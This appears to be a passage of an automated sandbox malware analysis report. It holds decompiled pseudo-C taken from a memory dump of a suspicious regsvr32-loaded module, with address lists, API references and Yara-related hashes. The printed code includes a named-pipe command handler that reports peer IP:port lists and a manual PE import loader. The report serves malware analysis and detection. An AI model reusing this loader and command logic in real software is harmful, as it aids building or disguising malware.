				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t137;
				signed int _t146;
				signed int _t148;
				signed short* _t149;
				signed int _t159;
				intOrPtr* _t183;
				void* _t187;
				void* _t188;
				void* _t189;
				signed short* _t192;
				void* _t196;
				signed int _t199;
				signed int _t200;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t206;
				void* _t208;
				void* _t214;
				void* _t221;

				_t221 = __fp0;
				_t208 = (_t206 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x537f818; // 0x546f8b0
					_push(0);
					_push( *0x537f804);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x537f818; // 0x546f8b0
					_push(0x80000);
					_push( *0x537f8bc);
					_push( *0x537f804);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t149 =  *0x537f8bc; // 0x0
						_t80 =  *_t149 & 0x0000ffff;
						_t214 = _t80 - 8;
						if(_t214 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E05370962( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t187);
								E0536D1A6(_t187);
								L32:
								L56:
								DisconnectNamedPipe( *0x537f804);
								_push(0);
								_pop(0);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E0536171A( &_v204, _t221);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t146 = _v204;
								_t90 = _t146 * 0x16;
								_v184 = _t146 * 0x16;
								_t203 = E05368BDE(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t188 = 0xa;
									E0536D1A6(_t188);
									L52:
									E05368BF4( &_v188, _t146);
									goto L32;
								}
								_t199 = 0;
								__eflags = _t146;
								if(_t146 == 0) {
									L50:
									_push(E0536A43D(_t203));
									_push(_t203);
									_t189 = 5;
									E0536D1A6(_t189);
									E05368BF4( &_v192, 0xffffffff);
									_t208 = _t208 + 0x10;
									goto L52;
								}
								_t159 = _v188 + 4;
								__eflags = _t159;
								_v204 = _t159;
								do {
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _t199 - _t146 - 1;
										if(_t199 < _t146 - 1) {
											_t102 = E0536A43D(_t203);
											_t159 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t159;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E0536A43D(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E0536A43D(_t203) + _t203;
										__eflags = _t110;
										E05369E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t159 = _v204;
										_t208 = _t208 + 0x20;
									}
									_t199 = _t199 + 1;
									_t159 = _t159 + 0x20;
									_v204 = _t159;
									__eflags = _t199 - _t146;
								} while (_t199 < _t146);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E0536171A( &_v204, _t221);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E05368BF4( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t214 == 0) {
							_t84 = E05370962( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t200 = E05369B33( &(_t149[4]), 0x20, 1,  &_v176);
							_v196 = _t200;
							__eflags = _t200;
							if(_t200 == 0) {
								L30:
								_t192 =  *0x537f8bc; // 0x0
								E05369EDB( &_v164,  &(_t192[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E05361DD3(E05369F6F( *_t200, __eflags), 0, 0, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E05368BDE(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t148 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E05361DD3(E05369F6F( *_t200, __eflags), _t127, _v184, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t129;
								E05369C2C( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E05369880( *((intOrPtr*)(_t200 + _t148 * 4)), E0536A43D( *((intOrPtr*)(_t200 + _t148 * 4))));
								_t183 = _v204;
								_t148 = _t148 + 1;
								 *_t183 = _t132;
								_v204 = _t183 + 4;
								__eflags = _t148 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t196 = 5;
							E05365EC3(E0536D1A6(_t196));
							_v172 = 1;
							goto L56;
						}
						_t137 = _t133;
						if(_t137 == 0) {
							_t84 = E05370940( &_v200);
							goto L16;
						}
						if(_t137 != 1) {
							goto L56;
						}
						E05370940( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































                                                                                                                                                                        0x0536377f
                                                                                                                                                                        0x05363785
                                                                                                                                                                        0x05363790
                                                                                                                                                                        0x05363794
                                                                                                                                                                        0x05363798
                                                                                                                                                                        0x05363798
                                                                                                                                                                        0x0536379d
                                                                                                                                                                        0x0536379e
                                                                                                                                                                        0x053637a4
                                                                                                                                                                        0x053637b0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053637c3
                                                                                                                                                                        0x053637c8
                                                                                                                                                                        0x053637c9
                                                                                                                                                                        0x053637ce
                                                                                                                                                                        0x053637d3
                                                                                                                                                                        0x053637d9
                                                                                                                                                                        0x053637e7
                                                                                                                                                                        0x05363af7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053637f8
                                                                                                                                                                        0x053637f8
                                                                                                                                                                        0x053637fe
                                                                                                                                                                        0x05363801
                                                                                                                                                                        0x05363804
                                                                                                                                                                        0x05363976
                                                                                                                                                                        0x05363976
                                                                                                                                                                        0x05363979
                                                                                                                                                                        0x05363aed
                                                                                                                                                                        0x05363833
                                                                                                                                                                        0x05363834
                                                                                                                                                                        0x05363838
                                                                                                                                                                        0x05363838
                                                                                                                                                                        0x0536383a
                                                                                                                                                                        0x0536383a
                                                                                                                                                                        0x0536383b
                                                                                                                                                                        0x0536395a
                                                                                                                                                                        0x0536395a
                                                                                                                                                                        0x0536395b
                                                                                                                                                                        0x05363960
                                                                                                                                                                        0x05363afd
                                                                                                                                                                        0x05363b03
                                                                                                                                                                        0x05363b0e
                                                                                                                                                                        0x05363b10
                                                                                                                                                                        0x05363b11
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363b11
                                                                                                                                                                        0x05363980
                                                                                                                                                                        0x05363980
                                                                                                                                                                        0x05363983
                                                                                                                                                                        0x053639c8
                                                                                                                                                                        0x053639cc
                                                                                                                                                                        0x053639d1
                                                                                                                                                                        0x053639d5
                                                                                                                                                                        0x053639d7
                                                                                                                                                                        0x05363ad8
                                                                                                                                                                        0x05363ade
                                                                                                                                                                        0x05363ae2
                                                                                                                                                                        0x05363859
                                                                                                                                                                        0x05363859
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363859
                                                                                                                                                                        0x053639dd
                                                                                                                                                                        0x053639e1
                                                                                                                                                                        0x053639e5
                                                                                                                                                                        0x053639ee
                                                                                                                                                                        0x053639f0
                                                                                                                                                                        0x053639f5
                                                                                                                                                                        0x053639f7
                                                                                                                                                                        0x05363ab2
                                                                                                                                                                        0x05363ab2
                                                                                                                                                                        0x05363ab2
                                                                                                                                                                        0x05363abb
                                                                                                                                                                        0x05363abd
                                                                                                                                                                        0x05363ac0
                                                                                                                                                                        0x05363ac1
                                                                                                                                                                        0x05363ac8
                                                                                                                                                                        0x05363ace
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363ace
                                                                                                                                                                        0x053639fd
                                                                                                                                                                        0x053639ff
                                                                                                                                                                        0x05363a01
                                                                                                                                                                        0x05363a90
                                                                                                                                                                        0x05363a97
                                                                                                                                                                        0x05363a98
                                                                                                                                                                        0x05363a9b
                                                                                                                                                                        0x05363a9c
                                                                                                                                                                        0x05363aa8
                                                                                                                                                                        0x05363aad
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363aad
                                                                                                                                                                        0x05363a0b
                                                                                                                                                                        0x05363a0b
                                                                                                                                                                        0x05363a0e
                                                                                                                                                                        0x05363a12
                                                                                                                                                                        0x05363a12
                                                                                                                                                                        0x05363a14
                                                                                                                                                                        0x05363a19
                                                                                                                                                                        0x05363a1b
                                                                                                                                                                        0x05363a1e
                                                                                                                                                                        0x05363a24
                                                                                                                                                                        0x05363a28
                                                                                                                                                                        0x05363a28
                                                                                                                                                                        0x05363a1b
                                                                                                                                                                        0x05363a2e
                                                                                                                                                                        0x05363a30
                                                                                                                                                                        0x05363a34
                                                                                                                                                                        0x05363a36
                                                                                                                                                                        0x05363a39
                                                                                                                                                                        0x05363a40
                                                                                                                                                                        0x05363a49
                                                                                                                                                                        0x05363a4f
                                                                                                                                                                        0x05363a54
                                                                                                                                                                        0x05363a5d
                                                                                                                                                                        0x05363a75
                                                                                                                                                                        0x05363a75
                                                                                                                                                                        0x05363a78
                                                                                                                                                                        0x05363a7d
                                                                                                                                                                        0x05363a81
                                                                                                                                                                        0x05363a81
                                                                                                                                                                        0x05363a84
                                                                                                                                                                        0x05363a85
                                                                                                                                                                        0x05363a88
                                                                                                                                                                        0x05363a8c
                                                                                                                                                                        0x05363a8c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363a12
                                                                                                                                                                        0x05363985
                                                                                                                                                                        0x05363988
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363992
                                                                                                                                                                        0x05363996
                                                                                                                                                                        0x0536399b
                                                                                                                                                                        0x0536399f
                                                                                                                                                                        0x053639a3
                                                                                                                                                                        0x053639a5
                                                                                                                                                                        0x053639ad
                                                                                                                                                                        0x053639b3
                                                                                                                                                                        0x053639b7
                                                                                                                                                                        0x053639bb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053639bb
                                                                                                                                                                        0x0536380a
                                                                                                                                                                        0x0536396c
                                                                                                                                                                        0x0536384c
                                                                                                                                                                        0x0536384d
                                                                                                                                                                        0x0536384f
                                                                                                                                                                        0x05363857
                                                                                                                                                                        0x05363858
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363858
                                                                                                                                                                        0x05363851
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363851
                                                                                                                                                                        0x05363810
                                                                                                                                                                        0x05363813
                                                                                                                                                                        0x0536388f
                                                                                                                                                                        0x05363891
                                                                                                                                                                        0x05363897
                                                                                                                                                                        0x05363899
                                                                                                                                                                        0x05363936
                                                                                                                                                                        0x05363936
                                                                                                                                                                        0x05363948
                                                                                                                                                                        0x0536394e
                                                                                                                                                                        0x05363957
                                                                                                                                                                        0x05363958
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363958
                                                                                                                                                                        0x0536389f
                                                                                                                                                                        0x053638a3
                                                                                                                                                                        0x053638a6
                                                                                                                                                                        0x0536392a
                                                                                                                                                                        0x0536392f
                                                                                                                                                                        0x05363932
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363932
                                                                                                                                                                        0x053638a8
                                                                                                                                                                        0x053638ab
                                                                                                                                                                        0x053638b3
                                                                                                                                                                        0x053638b8
                                                                                                                                                                        0x053638bd
                                                                                                                                                                        0x053638bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053638c3
                                                                                                                                                                        0x053638c4
                                                                                                                                                                        0x053638c6
                                                                                                                                                                        0x053638f5
                                                                                                                                                                        0x05363904
                                                                                                                                                                        0x05363909
                                                                                                                                                                        0x0536390c
                                                                                                                                                                        0x05363918
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363918
                                                                                                                                                                        0x053638c8
                                                                                                                                                                        0x053638cc
                                                                                                                                                                        0x053638da
                                                                                                                                                                        0x053638df
                                                                                                                                                                        0x053638e3
                                                                                                                                                                        0x053638e4
                                                                                                                                                                        0x053638e9
                                                                                                                                                                        0x053638ed
                                                                                                                                                                        0x053638ed
                                                                                                                                                                        0x053638f1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053638f1
                                                                                                                                                                        0x05363815
                                                                                                                                                                        0x05363818
                                                                                                                                                                        0x05363860
                                                                                                                                                                        0x05363861
                                                                                                                                                                        0x05363864
                                                                                                                                                                        0x0536386c
                                                                                                                                                                        0x05363871
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363871
                                                                                                                                                                        0x0536381b
                                                                                                                                                                        0x0536381e
                                                                                                                                                                        0x05363847
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05363847
                                                                                                                                                                        0x05363823
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536382e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536382e
                                                                                                                                                                        0x053637e7
                                                                                                                                                                        0x05363b1f

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 053637B2
                                                                                                                                                                          • Part of subcall function 0536D1A6: FlushFileBuffers.KERNEL32(00000000,?,05363AC6,00000000,00000004), ref: 0536D1EC
                                                                                                                                                                        • DisconnectNamedPipe.KERNEL32 ref: 05363B03
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                        • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                        • API String ID: 465096328-3858738763
                                                                                                                                                                        • Opcode ID: 0824b9d18ccd99b5c67ac2882c673a26c94b51265bf3d349501cb322596a83e8
                                                                                                                                                                        • Instruction ID: 545b7f97e6b7faffaad1e92819e151449db97bedd2caad520df123b25084e195
                                                                                                                                                                        • Opcode Fuzzy Hash: 0824b9d18ccd99b5c67ac2882c673a26c94b51265bf3d349501cb322596a83e8
                                                                                                                                                                        • Instruction Fuzzy Hash: 94A1BBB2A08305AFE315DF64C889A6AB7E8FB84310F04CD2EF15597288DB74D949CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0537370B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E0537370B(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0536EFA7(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                                                                                                                                                                        0x0537370b
                                                                                                                                                                        0x05373711
                                                                                                                                                                        0x05373719
                                                                                                                                                                        0x0537372e
                                                                                                                                                                        0x05373740
                                                                                                                                                                        0x0537374c
                                                                                                                                                                        0x05373752
                                                                                                                                                                        0x05373757
                                                                                                                                                                        0x05373763
                                                                                                                                                                        0x053738ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053738ce
                                                                                                                                                                        0x05373769
                                                                                                                                                                        0x05373772
                                                                                                                                                                        0x05373780
                                                                                                                                                                        0x05373783
                                                                                                                                                                        0x05373792
                                                                                                                                                                        0x05373792
                                                                                                                                                                        0x05373799
                                                                                                                                                                        0x053737a7
                                                                                                                                                                        0x053737aa
                                                                                                                                                                        0x053737ba
                                                                                                                                                                        0x053737c7
                                                                                                                                                                        0x053737ce
                                                                                                                                                                        0x053737de
                                                                                                                                                                        0x053737f0
                                                                                                                                                                        0x053737f6
                                                                                                                                                                        0x053737e0
                                                                                                                                                                        0x053737e8
                                                                                                                                                                        0x053737e8
                                                                                                                                                                        0x053737f9
                                                                                                                                                                        0x053737fd
                                                                                                                                                                        0x05373809
                                                                                                                                                                        0x0537380d
                                                                                                                                                                        0x05373811
                                                                                                                                                                        0x05373815
                                                                                                                                                                        0x05373821
                                                                                                                                                                        0x0537384c
                                                                                                                                                                        0x05373854
                                                                                                                                                                        0x0537385a
                                                                                                                                                                        0x05373866
                                                                                                                                                                        0x05373872
                                                                                                                                                                        0x05373823
                                                                                                                                                                        0x05373828
                                                                                                                                                                        0x05373833
                                                                                                                                                                        0x0537383f
                                                                                                                                                                        0x0537383f
                                                                                                                                                                        0x0537387b
                                                                                                                                                                        0x05373881
                                                                                                                                                                        0x0537388b
                                                                                                                                                                        0x053738a7
                                                                                                                                                                        0x0537388d
                                                                                                                                                                        0x05373890
                                                                                                                                                                        0x0537389c
                                                                                                                                                                        0x0537389c
                                                                                                                                                                        0x0537388b
                                                                                                                                                                        0x053738af
                                                                                                                                                                        0x053738b8
                                                                                                                                                                        0x053738b8
                                                                                                                                                                        0x053738c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053738c6
                                                                                                                                                                        0x053737d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053737d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053737aa
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 05373728
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 053737C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                        • API String ID: 4133054770-1584408056
                                                                                                                                                                        • Opcode ID: fb11051b113ad2ed1083a7748a5db275794e834559ab29c802d18049df353d4a
                                                                                                                                                                        • Instruction ID: 009cfb9352fd7a386caf5fee4b118371cc9be5e8b5218e1ca1def9668f5e7982
                                                                                                                                                                        • Opcode Fuzzy Hash: fb11051b113ad2ed1083a7748a5db275794e834559ab29c802d18049df353d4a
                                                                                                                                                                        • Instruction Fuzzy Hash: C0618E75E10209EFDB11CF98C485BADBBF1FF08315F248599E815AB291C778AA84DF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05374100 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 99%
                                                                                                                                                                        			E05374100(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xfed1e900
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0xbde85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E05377120(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E05375E80(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xbde85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E05375FC0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8341ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xed7505f9
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
